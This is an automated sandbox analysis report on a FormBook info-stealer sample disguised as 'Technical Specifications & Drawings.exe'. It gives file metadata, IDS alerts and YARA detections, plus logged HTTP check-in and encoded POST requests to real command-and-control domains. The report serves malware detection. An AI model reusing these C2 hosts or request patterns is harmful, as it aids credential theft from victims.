                                                SHA512:02660cedcbf7d4a6d075eaa8bbd79bd560fc88ae1bbe5032348240f499432294f9c889b55f96e5f2e4214b7fe838df647a0cf4afefe2778b831af0d7dfd4e3dd
                                                SSDEEP:24576:hFxgV10E4B8aMrhPemfzId4MaZAOzje9IbUDHDl:tgVWES8z04eOzj7U
                                                TLSH:1805BE0BAF147708C5A76AB5EE0BBD76A7F61C5D3135D0B83A617C0A4AFF301E51242A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..b..............0..............L... ...`....@.. ....................................@................................
                                                Icon Hash:00828e8e8686b000
                                                Entrypoint:0x4c4cea
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F0AC40 [Mon Aug 8 06:25:04 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc4c98 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc6000 | 0x390 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc2cf0 | 0xc2e00 | False | 0.8121780287844772 | data | 7.780783068719605 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc6000 | 0x390 | 0x400 | False | 0.369140625 | data | 2.8640931166907952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xc6058 | 0x334 | data | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/08/22-12:28:44.161490 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 67.23.226.119
08/08/22-12:28:44.161490 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 67.23.226.119
08/08/22-12:28:49.631208 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49809 | 80 | 192.168.2.3 | 67.223.117.72
08/08/22-12:28:49.631208 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49809 | 80 | 192.168.2.3 | 67.223.117.72
08/08/22-12:28:49.631208 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49809 | 80 | 192.168.2.3 | 67.223.117.72
08/08/22-12:28:44.161490 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 67.23.226.119
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 8, 2022 12:28:32.168889046 CEST | 192.168.2.3 | 8.8.8.8 | 0x260e | Standard query (0) | www.kirchhoff-darryl.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:38.314755917 CEST | 192.168.2.3 | 8.8.8.8 | 0x93ae | Standard query (0) | www.tomoptique.fr | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:43.877885103 CEST | 192.168.2.3 | 8.8.8.8 | 0xd4b1 | Standard query (0) | www.boshi-eg.online | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:49.332912922 CEST | 192.168.2.3 | 8.8.8.8 | 0x603 | Standard query (0) | www.esandcraic.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:01.681569099 CEST | 192.168.2.3 | 8.8.8.8 | 0x7af8 | Standard query (0) | www.mexc-event-partner.site | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:07.523072958 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:08.532000065 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:09.578977108 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:11.663458109 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:12.571427107 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:13.579313993 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:14.594968081 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:16.610747099 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:22.596843958 CEST | 192.168.2.3 | 8.8.8.8 | 0xdf98 | Standard query (0) | www.fundycases.com | A (IP address) | IN (0x0001)
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Aug 8, 2022 12:28:32.449382067 CEST | 8.8.8.8 | 192.168.2.3 | 0x260e | No error (0) | www.kirchhoff-darryl.com |  | 107.155.208.43 | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:28:38.334137917 CEST | 8.8.8.8 | 192.168.2.3 | 0x93ae | No error (0) | www.tomoptique.fr | tomoptique.fr |  | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 12:28:38.334137917 CEST | 8.8.8.8 | 192.168.2.3 | 0x93ae | No error (0) | tomoptique.fr |  | 109.234.162.62 | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:28:44.018109083 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4b1 | No error (0) | www.boshi-eg.online | boshi-eg.online |  | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 12:28:44.018109083 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4b1 | No error (0) | boshi-eg.online |  | 67.23.226.119 | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:28:49.456350088 CEST | 8.8.8.8 | 192.168.2.3 | 0x603 | No error (0) | www.esandcraic.com |  | 67.223.117.72 | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:01.719481945 CEST | 8.8.8.8 | 192.168.2.3 | 0x7af8 | No error (0) | www.mexc-event-partner.site | mexc-event-partner.site |  | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 12:29:01.719481945 CEST | 8.8.8.8 | 192.168.2.3 | 0x7af8 | No error (0) | mexc-event-partner.site |  | 184.168.107.80 | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:12.542298079 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:13.551590919 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:14.598031998 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:16.682765961 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:17.592346907 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:18.598768950 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:19.614202976 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:21.629395008 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | www.fundycases.com | gcdn0.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | gcdn0.wixdns.net | balancer.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-199-15-163-148.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | td-balancer-199-15-163-148.wixdns.net |  | 199.15.163.148 | A (IP address) | IN (0x0001)
                                                • www.kirchhoff-darryl.com
                                                • www.tomoptique.fr
                                                • www.boshi-eg.online
                                                • www.esandcraic.com
                                                • www.mexc-event-partner.site
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.3 | 49776 | 107.155.208.43 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 12:28:32.786432028 CEST | 7566 | OUT | GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.kirchhoff-darryl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:33.078955889 CEST | 7566 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:32 GMT
                                                Server: Apache/2.2.15 (CentOS)
                                                Location: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_
                                                Content-Length: 457
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&amp;wRtdp=ETVPg0_">here</a>.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.kirchhoff-darryl.com Port 80</address></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                1 | 192.168.2.3 | 49780 | 109.234.162.62 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 12:28:38.365463018 CEST | 7583 | OUT | GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.tomoptique.fr
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:38.864422083 CEST | 7587 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_
                                                Server: o2switch-PowerBoost-v3


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.3 | 49803 | 67.23.226.119 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 12:28:44.161489964 CEST | 7676 | OUT | GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.boshi-eg.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:44.300245047 CEST | 7677 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:44 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                3 | 192.168.2.3 | 49809 | 67.223.117.72 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 12:28:49.631207943 CEST | 7769 | OUT | GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.esandcraic.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:49.902386904 CEST | 7770 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:49 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                4 | 192.168.2.3 | 49817 | 184.168.107.80 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 12:29:01.972229004 CEST | 8097 | OUT | POST /02pi/ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Content-Length: 409
                                                Cache-Control: no-cache
                                                Origin: http://www.mexc-event-partner.site
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.mexc-event-partner.site/02pi/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
                                                Aug 8, 2022 12:29:02.232486010 CEST | 8099 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                5 | 192.168.2.3 | 49818 | 184.168.107.80 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 12:29:02.227710009 CEST | 8098 | OUT | GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:29:02.489057064 CEST | 8100 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Target ID:0
                                                Start time:12:27:07
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
                                                Imagebase:0x400000
                                                File size:800256 bytes
                                                MD5 hash:9B94F751E8CC145058DB9F428C2AD571
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:4
                                                Start time:12:27:16
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Imagebase:0xd20000
                                                File size:800256 bytes
                                                MD5 hash:9B94F751E8CC145058DB9F428C2AD571
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Target ID:5
                                                Start time:12:27:19
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6b8cf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:19
                                                Start time:12:27:54
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\control.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                Imagebase:0x1c0000
                                                File size:114688 bytes
                                                MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate


                                                  Execution Graph

                                                  Execution Coverage:12.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:2.6%
                                                  Total number of Nodes:190
                                                  Total number of Limit Nodes:8

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
